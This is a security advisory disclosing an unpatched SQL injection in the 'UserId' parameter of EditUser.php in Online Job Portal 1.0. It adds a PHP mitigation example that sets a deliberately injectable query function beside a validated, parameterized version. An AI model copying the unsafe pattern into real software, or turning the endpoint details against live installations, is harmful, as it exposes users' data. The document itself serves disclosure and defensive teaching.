Vendor: Online Job Portal
By: Akıner Kısa
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Online Job Portal
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_job_portal:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP
2020
Online Job Portal 1.0 – ‘userid’ SQL Injection
The vulnerability exists due to improper validation of user-supplied input in the 'UserId' parameter of the 'EditUser.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. This can be exploited to disclose sensitive information, modify data, compromise the integrity of data, and, in certain circumstances, execute arbitrary code on the system.
Mitigation:
Validate user-supplied input to reject unexpected values, and build database access on parameterized queries or stored procedures rather than on SQL strings assembled from request data.
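The mitigation above, as an added PHP example that is not code from the Online Job Portal project and not the actual contents of EditUser.php: the first function shows the injectable pattern the advisory describes (the request value is spliced into the query text), the second shows the validated, parameterized form. The table and column names, the shape of the request array, and the MySQL connection details are assumptions.

```php
<?php
// Added example, not the project's own code. Table and column names
// (users, id, name, email) and the request array layout are assumptions.

// Illustrative vulnerable pattern: the raw UserId value becomes part of the
// SQL text, so the database parses whatever the client sends as query syntax.
function lookupUserUnsafe(mysqli $db, array $request)
{
    $sql = "SELECT id, name, email FROM users WHERE id = " . $request['UserId'];
    return $db->query($sql);
}

// Hardened form: validate the input as a positive integer first, then bind it
// as a parameter so it is only ever treated as data, never as SQL.
function lookupUserSafe(mysqli $db, array $request): ?array
{
    $userId = filter_var($request['UserId'] ?? '', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($userId === false) {
        // Anything that is not a positive integer is rejected before any DB call.
        http_response_code(400);
        return null;
    }

    $stmt = $db->prepare("SELECT id, name, email FROM users WHERE id = ?");
    $stmt->bind_param('i', $userId);   // 'i' binds the value as an integer
    $stmt->execute();
    // get_result() requires the mysqlnd driver, which XAMPP ships with.
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (connection values are placeholders, not the project's configuration):
// $db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'DB_NAME');
// $user = lookupUserSafe($db, $_GET);
```

Note that the integer check alone is not the defense: it narrows what the handler accepts, but the prepared statement is what guarantees the value cannot alter the query structure, so both belong in the fix.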